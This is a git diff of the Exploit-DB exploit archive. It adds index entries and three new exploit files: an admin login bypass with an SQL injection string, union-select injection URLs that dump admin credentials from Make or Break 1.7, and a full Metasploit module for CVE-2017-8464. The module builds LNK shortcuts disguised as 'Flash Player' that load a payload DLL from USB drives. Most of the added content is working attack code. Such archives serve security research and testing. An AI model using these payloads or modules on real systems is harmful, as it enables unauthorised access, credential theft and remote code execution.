diff --git a/files.csv b/files.csv
index b4cce7821..582ab7d54 100644
--- a/files.csv
+++ b/files.csv
@@ -9152,6 +9152,7 @@ id,file,description,date,author,platform,type,port
 42334,platforms/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation",2017-07-18,"Mark Wadham",macos,local,0
 42357,platforms/linux/local/42357.py,"MAWK 1.3.3-17 - Local Buffer Overflow",2017-07-24,"Juan Sacco",linux,local,0
 42368,platforms/win_x86-64/local/42368.rb,"Razer Synapse 2.20.15.1104 - rzpnk.sys ZwOpenProcess (Metasploit)",2017-07-24,Metasploit,win_x86-64,local,0
+42382,platforms/windows/local/42382.rb,"Microsoft Windows - LNK Shortcut File Code Execution (Metasploit)",2017-07-26,"Yorick Koster",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15699,7 +15700,7 @@ id,file,description,date,author,platform,type,port
 42327,platforms/windows/remote/42327.html,"Firefox 50.0.1 - ASM.JS JIT-Spray Remote Code Execution",2017-07-14,Rh0,windows,remote,0
 42328,platforms/windows/remote/42328.py,"FTPGetter 5.89.0.85 - Buffer Overflow (SEH)",2017-07-14,"Paul Purcell",windows,remote,0
 42331,platforms/hardware/remote/42331.txt,"Belkin NetCam F7D7601 - Multiple Vulnerabilities",2017-07-17,Wadeek,hardware,remote,0
-42354,platforms/windows/remote/42354.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-07-24,"Mohamed Hamdy",windows,remote,0
+42354,platforms/win_x86-64/remote/42354.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-07-24,redr2e,win_x86-64,remote,0
 42369,platforms/cgi/remote/42369.rb,"IPFire < 2.19 Update Core 110 - Remote Code Execution (Metasploit)",2017-07-24,Metasploit,cgi,remote,0
 42370,platforms/unix/remote/42370.rb,"VICIdial 2.9 RC 1 to 2.13 RC1 - user_authorization Unauthenticated Command Execution (Metasploit)",2017-07-24,Metasploit,unix,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
@@ -38180,3 +38181,5 @@ id,file,description,date,author,platform,type,port
 42371,platforms/json/webapps/42371.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Remote Command Execution",2017-07-24,"RedTeam Pentesting",json,webapps,0
 42372,platforms/json/webapps/42372.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Arbitrary File Disclosure",2017-07-24,"RedTeam Pentesting",json,webapps,0
 42378,platforms/multiple/webapps/42378.html,"WebKit JSC - 'JSObject::putInlineSlow and JSValue::putToPrimitive' Universal Cross-Site Scripting",2017-07-25,"Google Security Research",multiple,webapps,0
+42379,platforms/php/webapps/42379.txt,"Friends in War Make or Break 1.7 - Authentication Bypass",2017-07-25,Adam,php,webapps,0
+42381,platforms/php/webapps/42381.txt,"Friends in War Make or Break 1.7 - SQL Injection",2017-07-26,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/php/webapps/10488.txt b/platforms/php/webapps/10488.txt
index 582f39cc5..b35efc83a 100755
--- a/platforms/php/webapps/10488.txt
+++ b/platforms/php/webapps/10488.txt
@@ -130,7 +130,7 @@ and subdate(curdate(), interval 9999
 9999 DAY) union select 1,1,1,user_email,1,1,1 from wp_users where id=1
 and subdate(curdate(), interval 9999
 
-## E-DB NOTE: Try 999 days if 9999 doesn't work in your environment.
+## Exploit-DB Note: Try using "999 DAY)" if 9999 doesn't work in your environment.
 
 I wrote a PoC, to get automatically the password hash of the WordPress
 admin account:
diff --git a/platforms/php/webapps/42379.txt b/platforms/php/webapps/42379.txt
new file mode 100755
index 000000000..3f9e3b053
--- /dev/null
+++ b/platforms/php/webapps/42379.txt
@@ -0,0 +1,25 @@
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+[x] Type: Admin login bypass via SQLi
+
+[x] Vendor: http://software.friendsinwar.com/
+
+[x] Script Name: Make or Break
+
+[x] Script Version: 1.7
+
+[x] Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
+
+[x] Author: Anarchy Angel
+
+[x] Mail: anarchy[dot]ang31@gmail[dot]com
+
+[x] More info: https://aahideaway.blogspot.com/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+
+Navigate to scripts admin login page and submit admin' or ''='-- for username
+
+and it should give you access to the admin area. A quick release to
+kick off DefCon festivities. See you there! Enjoy >:)
diff --git a/platforms/php/webapps/42381.txt b/platforms/php/webapps/42381.txt
new file mode 100755
index 000000000..65e90e656
--- /dev/null
+++ b/platforms/php/webapps/42381.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Friends in War Make or Break 1.7 SQL Injection
+# Dork: N/A
+# Date: 26.07.2017
+# Vendor : http://software.friendsinwar.com/
+# Software: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
+# Demo: http://localhost/[PATH]/
+# Version: 1.7
+# # # # #
+# Author: Ihsan Sencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/useruploads.php?username=[SQL]
+# -sie'+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+mob_admin--+-
+# http://localhost/[PATH]/index.php?catid=SQL]
+# 1+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+mob_admin--+-
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/windows/remote/42354.html b/platforms/win_x86-64/remote/42354.html
similarity index 90%
rename from platforms/windows/remote/42354.html
rename to platforms/win_x86-64/remote/42354.html
index 46595aa3d..cc0b15fb0 100755
--- a/platforms/windows/remote/42354.html
+++ b/platforms/win_x86-64/remote/42354.html
@@ -1,36 +1,3 @@
-# Exploit Title: Microsoft Internet Explorer - 'mshtml.dll' Remote
-Code Execution (MS17-007)
-# Google Dork: NA
-# Date: 24/7/2017
-# Exploit Author: Mohamed Hamdy - Nsecurity
-# Vendor Homepage: https://www.microsoft.com
-# Version: Microsoft Internet Explorer 11
-# Tested on: Windows 7 SP1 x86
-# CVE : CVE-2017-0037
- 
-<!--
-  
-                      CVE-2017-0037 
- 
-mshtml.dll::HandleColumnBreakOnColumnSpanningElement
- 
- 
-Affected Version:
-Microsoft Internet Explorer 10 and 11 and Microsoft Edge
- 
- 
-Test Bed:
-Microsoft Internet Explorer 10 and 11
-OS: Windows 7 SP1 x86
- 
-Advisory:
-https://technet.microsoft.com/en-us/library/security/ms17-007.aspx
- 
- 
-Author: Mohamed Hamdy AKA "Nsecurity"
-Email: n.s3curity.service@gmail.com
-Jid : Nsecurity@jabber.ru
- 
 <!DOCTYPE html>
 <html>
 <head>
diff --git a/platforms/windows/local/42382.rb b/platforms/windows/local/42382.rb
new file mode 100755
index 000000000..7a8e91b7b
--- /dev/null
+++ b/platforms/windows/local/42382.rb
@@ -0,0 +1,177 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+
+  attr_accessor :exploit_dll_name
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'LNK Remote Code Execution Vulnerability',
+      'Description'     => %q{
+        This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)
+        that contain a dynamic icon, loaded from a malicious DLL.
+
+        This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is
+        similar except in an additional SpecialFolderDataBlock is included. The folder ID set
+        in this SpecialFolderDataBlock is set to the Control Panel. This is enought to bypass
+        the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary
+        DLL file.
+      },
+      'Author'          =>
+        [
+          'Uncredited',   # vulnerability discovery
+          'Yorick Koster' # msf module
+        ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          ['CVE', '2017-8464'],
+          ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],
+          ['URL', 'http://paper.seebug.org/357/'], # writeup
+          ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'] # writeup
+        ],
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC'    => 'process',
+        },
+      'Arch'            => [ARCH_X86, ARCH_X64],
+      'Payload'         =>
+        {
+          'Space'       => 2048,
+        },
+      'Platform'        => 'win',
+      'Targets'         =>
+        [
+          [ 'Windows x64', { 'Arch' => ARCH_X64 } ],
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ]
+        ],
+      'DefaultTarget'  => 0, # Default target is 64-bit
+      'DisclosureDate'  => 'Jun 13 2017'))
+
+    register_advanced_options(
+      [
+        OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true])
+      ])
+  end
+
+  def exploit
+    dll = generate_payload_dll
+    dll_name = "#{rand_text_alpha(16)}.dll"
+    dll_path = store_file(dll, dll_name)
+    print_status("#{dll_path} created copy it to the root folder of the target USB drive")
+
+    # HACK the vulnerability doesn't appear to work with UNC paths
+    # Create LNK files to different drives instead
+    'DEFGHIJKLMNOPQRSTUVWXYZ'.split("").each do |i|
+      lnk = generate_link("#{i}:\\#{dll_name}")
+      lnk_path = store_file(lnk, "#{rand_text_alpha(16)}_#{i}.lnk")
+      print_status("#{lnk_path} create, copy to the USB drive if drive letter is #{i}")
+    end
+  end
+
+  def generate_link(path)
+    path << "\x00"
+    display_name = "Flash Player\x00" # LNK Display Name
+    comment = "\x00"
+
+    # Control Panel Applet ItemID with our DLL
+    cpl_applet = [
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, 
+      0x00, 0x00
+    ].pack('C*')
+    cpl_applet << [path.length].pack('v')
+    cpl_applet << [display_name.length].pack('v')
+    cpl_applet << path.unpack('C*').pack('v*')
+    cpl_applet << display_name.unpack('C*').pack('v*')
+    cpl_applet << comment.unpack('C*').pack('v*')
+
+    # LinkHeader
+    ret = [
+      0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C
+      0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046
+      0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode)
+      0x00, 0x00, 0x00, 0x00, # FileAttributes
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime
+      0x00, 0x00, 0x00, 0x00, # FileSize
+      0x00, 0x00, 0x00, 0x00, # IconIndex
+      0x00, 0x00, 0x00, 0x00, # ShowCommand
+      0x00, 0x00, # HotKey
+      0x00, 0x00, # Reserved1
+      0x00, 0x00, 0x00, 0x00, # Reserved2
+      0x00, 0x00, 0x00, 0x00  # Reserved3
+    ].pack('C*')
+
+    # IDList
+    idlist_data = ''
+    idlist_data << [0x12 + 2].pack('v') # ItemIDSize
+    idlist_data << [
+      # This PC
+      0x1f, 0x50, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30,
+      0x30, 0x9d
+    ].pack('C*')
+    idlist_data << [0x12 + 2].pack('v') # ItemIDSize
+    idlist_data << [
+      # All Control Panel Items
+      0x2e, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,
+      0x30, 0x9d
+    ].pack('C*')
+    idlist_data << [cpl_applet.length + 2].pack('v')
+    idlist_data << cpl_applet
+    idlist_data << [0x00].pack('v') # TerminalID
+
+    # LinkTargetIDList
+    ret << [idlist_data.length].pack('v') # IDListSize
+    ret << idlist_data
+
+    # ExtraData
+    # SpecialFolderDataBlock
+    ret << [
+      0x10, 0x00, 0x00, 0x00, # BlockSize
+      0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005
+      0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\Control Panel)
+      0x28, 0x00, 0x00, 0x00  # Offset in LinkTargetIDList
+    ].pack('C*')
+    # TerminalBlock
+    ret << [0x00, 0x00, 0x00, 0x00].pack('V')
+    ret
+  end
+
+  # Store the file in the MSF local directory (eg, /root/.msf4/local/)
+  def store_file(data, filename)
+    ltype = "exploit.fileformat.#{self.shortname}"
+
+    if ! ::File.directory?(Msf::Config.local_directory)
+      FileUtils.mkdir_p(Msf::Config.local_directory)
+    end
+
+    if filename and not filename.empty?
+      if filename =~ /(.*)\.(.*)/
+        ext = $2
+        fname = $1
+      else
+        fname = filename
+      end
+    else
+      fname = "local_#{Time.now.utc.to_i}"
+    end
+
+    fname = ::File.split(fname).last
+
+    fname.gsub!(/[^a-z0-9\.\_\-]+/i, '')
+    fname << ".#{ext}"
+
+    path = File.join("#{Msf::Config.local_directory}/", fname)
+    full_path = ::File.expand_path(path)
+    File.open(full_path, "wb") { |fd| fd.write(data) }
+
+    full_path.dup
+  end
+end
\ No newline at end of file